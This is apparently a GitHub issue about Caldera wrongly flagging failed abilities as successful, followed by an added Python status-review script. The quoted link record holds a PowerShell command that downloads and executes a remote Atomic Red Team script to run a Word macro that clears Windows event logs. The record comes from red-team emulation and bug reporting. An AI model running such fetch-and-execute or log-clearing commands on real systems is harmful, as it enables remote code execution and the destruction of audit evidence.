Looks like your first issue -- we aim to respond to issues as quickly as possible. In the meantime, check out our documentation here: http://caldera.readthedocs.io/
Seems like this issue was caused by an incomplete API call where I add an ability as a potential link to an operation. Unfortunately there is no default fallback for undefined parameters (e.g. tactic name, technique ID, etc.). In my case this resulted in the lack of the atomic parser module. After assigning the value explicitly I got correct readings. For me, given you already require the ability_id, it could use these values by default, just like it does if you use the GUI. Issue closed for me.
I am experiencing issues with the way caldera is evaluating whether links/abilities have been successfully executed while no exit_code is available. In my case there is clearly an issue with the command execution yet it gets flagged with a status of 0 (success). Wouldn't it be more logical to add the exit code as a potential discriminator for successful command execution?
```json
{
  "ability_metadata": {
    "ability_description": "Manual command ability",
    "ability_id": "05f8b752dbccff102ef530103bd8e550",
    "ability_name": "Clear Event Logs via VBA"
  },
  "agent_metadata": {
    "architecture": "amd64",
    "contact": "HTTP",
    "created": "2023-07-10T12:51:54Z",
    "group": "secops",
    "host": "perp-clt-w101",
    "location": "C:\\Users\\Public\\splunkd.exe",
    "paw": "ddntzl",
    "pid": 7024,
    "ppid": 5208,
    "privilege": "User",
    "username": "PERP\\kkevin"
  },
  "agent_reported_time": "2023-07-28T10:08:54Z",
  "attack_metadata": {
    "tactic": "defense-evasion",
    "technique_id": "T1070.001",
    "technique_name": "auto-generated"
  },
  "collected_timestamp": "2023-07-28T12:08:55Z",
  "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing); Invoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1070.001\\src\\T1070.001-macrocode.txt\" -officeProduct \"Word\" -sub \"ClearLogs\"",
  "delegated_timestamp": "2023-07-28T12:08:33Z",
  "executor": "psh",
  "finished_timestamp": "2023-07-28T12:08:59Z",
  "operation_metadata": {
    "operation_adversary": "ad-hoc",
    "operation_name": "TUC00034",
    "operation_start": "2023-07-28T12:08:33Z"
  },
  "output": {
    "exit_code": "",
    "stderr": "",
    "stdout": "Get-Content : Cannot find path 'C:\\Users\\kkevin\\Desktop\\PathToAtomicsFolder\\T1070.001\\src\\T1070.001-macrocode.txt' because it does not exist.At line:77 char:22+ $macroCode = Get-Content $macroFile -Raw+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (C:\\Users\\kkevin...1-macrocode.txt:String) [Get-Content], ItemNotFoundException + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand Exception calling \"Run\" with \"1\" argument(s): \"Can't run the specified macro\"At line:91 char:5+ $app.Run($sub)+ ~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : COMException "
  },
  "pid": 1636,
  "plaintext_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing); Invoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1070.001\\src\\T1070.001-macrocode.txt\" -officeProduct \"Word\" -sub \"ClearLogs\"",
  "platform": "windows",
  "status": 0
}
```
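As an added illustration (not Caldera's own code and not from the issue), a small Python review pass that re-scores a link record like the one above before trusting `"status": 0`: a returned exit code is treated as authoritative, and when the exit code is empty the captured output is checked for PowerShell error records. The abbreviated sample record and the error-marker regexes are constructed assumptions.

```python
import re

# Constructed sample, abbreviated from the link record quoted in the issue above.
SAMPLE_LINK = {
    "executor": "psh",
    "output": {
        "exit_code": "",
        "stdout": (
            "Get-Content : Cannot find path 'C:\\Users\\kkevin\\Desktop\\PathToAtomicsFolder"
            "\\T1070.001\\src\\T1070.001-macrocode.txt' because it does not exist. "
            "+ CategoryInfo : ObjectNotFound: [Get-Content], ItemNotFoundException "
            "+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand"
        ),
    },
    "status": 0,
}

# Markers PowerShell (the "psh" executor) prints on failure even when no exit code
# reaches the server. Assumed review heuristics, not Caldera's own status logic.
PSH_ERROR_MARKERS = (
    re.compile(r"\bCategoryInfo\s*:"),
    re.compile(r"\bFullyQualifiedErrorId\s*:"),
    re.compile(r"\bException calling\b"),
)


def review_link(link: dict) -> dict:
    """Re-evaluate one Caldera link result instead of trusting 'status' alone."""
    out = link.get("output", {})
    exit_code = str(out.get("exit_code", "")).strip()
    text = f"{out.get('stdout', '')}\n{out.get('stderr', '')}"
    hits = [m.pattern for m in PSH_ERROR_MARKERS if m.search(text)]
    reported_success = link.get("status") == 0
    if exit_code:
        # An exit code did arrive: treat it as authoritative over 'status'.
        verdict = "success" if exit_code == "0" else "failure"
    elif hits and link.get("executor") == "psh":
        verdict = "failure"  # no exit code, but stdout carries PowerShell error records
    else:
        verdict = "success" if reported_success else "failure"
    return {
        "reported_status": link.get("status"),
        "exit_code": exit_code or None,
        "error_markers": hits,
        "verdict": verdict,
        "suspicious": reported_success and verdict == "failure",
    }


if __name__ == "__main__":
    print(review_link(SAMPLE_LINK))
```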